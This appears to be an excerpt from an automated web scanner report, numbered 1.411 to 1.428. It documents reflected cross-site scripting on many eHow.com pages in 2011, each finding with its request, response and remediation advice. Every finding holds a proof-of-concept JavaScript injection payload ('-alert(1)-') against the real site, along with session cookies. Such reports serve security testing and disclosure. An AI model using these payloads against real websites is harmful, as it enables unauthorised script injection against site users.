GET /legal/?7c967'-alert(1)-'f0d7f914f94=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:45 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73302
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Legal - How To Information | eHow.com</title>
1.411. http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/list_6515049_common-english-grammar-mistakes.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d4f'-alert(1)-'1fbf08c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_6515049_common-english-grammar-mistakes.html?10d4f'-alert(1)-'1fbf08c4b2=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73897
1.412. http://www.ehow.com/list_7189463_grammar-check-tools.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/list_7189463_grammar-check-tools.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f696'-alert(1)-'36d4bf4f664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_7189463_grammar-check-tools.html?8f696'-alert(1)-'36d4bf4f664=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74112
1.413. http://www.ehow.com/mental-health/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /mental-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eff9'-alert(1)-'f101b15d2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mental-health/?6eff9'-alert(1)-'f101b15d2dd=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70531
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Mental Health - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/mental-health/?6eff9'-alert(1)-'f101b15d2dd=1" ref="like" width="300"> ...[SNIP]...
1.414. http://www.ehow.com/music/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /music/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c895b'-alert(1)-'64cf7ef5a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /music/?c895b'-alert(1)-'64cf7ef5a86=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70451
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Music - How To Information | eHow.com</title>
1.415. http://www.ehow.com/parenting/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /parenting/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d92b9'-alert(1)-'0c6c4fea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /parenting/?d92b9'-alert(1)-'0c6c4fea76f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71130
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Parenting - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/parenting/?d92b9'-alert(1)-'0c6c4fea76f=1" ref="like" width="300"> ...[SNIP]...
1.416. http://www.ehow.com/personal-finance/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /personal-finance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af06a'-alert(1)-'0adecf09358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/?af06a'-alert(1)-'0adecf09358=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72649
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Personal Finance - How To Information | eHow.com< ...[SNIP]... <fb:like href="http://www.ehow.com/personal-finance/?af06a'-alert(1)-'0adecf09358=1" ref="like" width="300"> ...[SNIP]...
1.417. http://www.ehow.com/pets-and-animals/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /pets-and-animals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b3ff'-alert(1)-'99115dd9ab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pets-and-animals/?4b3ff'-alert(1)-'99115dd9ab8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73362
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Pets & Animals - How To Information | eHow.com</t ...[SNIP]... <fb:like href="http://www.ehow.com/pets-and-animals/?4b3ff'-alert(1)-'99115dd9ab8=1" ref="like" width="300"> ...[SNIP]...
1.418. http://www.ehow.com/plant-care/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /plant-care/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca0be'-alert(1)-'24a20a51608 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plant-care/?ca0be'-alert(1)-'24a20a51608=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70342
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plant Care - How To Information | eHow.com</title ...[SNIP]... <fb:like href="http://www.ehow.com/plant-care/?ca0be'-alert(1)-'24a20a51608=1" ref="like" width="300"> ...[SNIP]...
1.419. http://www.ehow.com/plants/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /plants/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6081b'-alert(1)-'569f4a88c46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plants/?6081b'-alert(1)-'569f4a88c46=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70810
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plants - How To Information | eHow.com</title>
1.420. http://www.ehow.com/real-estate-and-investment/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /real-estate-and-investment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53aa7'-alert(1)-'f84def696ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real-estate-and-investment/?53aa7'-alert(1)-'f84def696ff=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71097
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Real Estate & Investment - How To Information | e ...[SNIP]... <fb:like href="http://www.ehow.com/real-estate-and-investment/?53aa7'-alert(1)-'f84def696ff=1" ref="like" width="300"> ...[SNIP]...
1.421. http://www.ehow.com/recipes/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /recipes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e535'-alert(1)-'5ff63e72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recipes/?9e535'-alert(1)-'5ff63e72f1=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72823
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recipes - How To Information | eHow.com</title>
1.422. http://www.ehow.com/recreational-activities/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /recreational-activities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6547a'-alert(1)-'db6d13f88f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recreational-activities/?6547a'-alert(1)-'db6d13f88f8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70427
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recreational Activities - How To Information | eH ...[SNIP]... <fb:like href="http://www.ehow.com/recreational-activities/?6547a'-alert(1)-'db6d13f88f8=1" ref="like" width="300"> ...[SNIP]...
1.423. http://www.ehow.com/relationships-and-family/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /relationships-and-family/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444c6'-alert(1)-'5534980880c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /relationships-and-family/?444c6'-alert(1)-'5534980880c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70621
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Relationships & Family - How To Information | eHo ...[SNIP]... <fb:like href="http://www.ehow.com/relationships-and-family/?444c6'-alert(1)-'5534980880c=1" ref="like" width="300"> ...[SNIP]...
1.424. http://www.ehow.com/sports/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /sports/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad51'-alert(1)-'d33a740e072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports/?1ad51'-alert(1)-'d33a740e072=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71169
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Sports - How To Information | eHow.com</title>
1.425. http://www.ehow.com/topic_227_take-pictures.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_227_take-pictures.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590af'-alert(1)-'b3eeb86d5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_227_take-pictures.html?590af'-alert(1)-'b3eeb86d5e9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.426. http://www.ehow.com/topic_2488_lose-weight.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_2488_lose-weight.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c273d'-alert(1)-'baed76bbb17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_2488_lose-weight.html?c273d'-alert(1)-'baed76bbb17=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.427. http://www.ehow.com/topic_253_lose-weight-now.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_253_lose-weight-now.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645b7'-alert(1)-'6bc677f85f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_253_lose-weight-now.html?645b7'-alert(1)-'6bc677f85f8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.428. http://www.ehow.com/topic_3493_lose-weight-dieting.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_3493_lose-weight-dieting.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93580'-alert(1)-'755710e4e75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3493_lose-weight-dieting.html?93580'-alert(1)-'755710e4e75=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
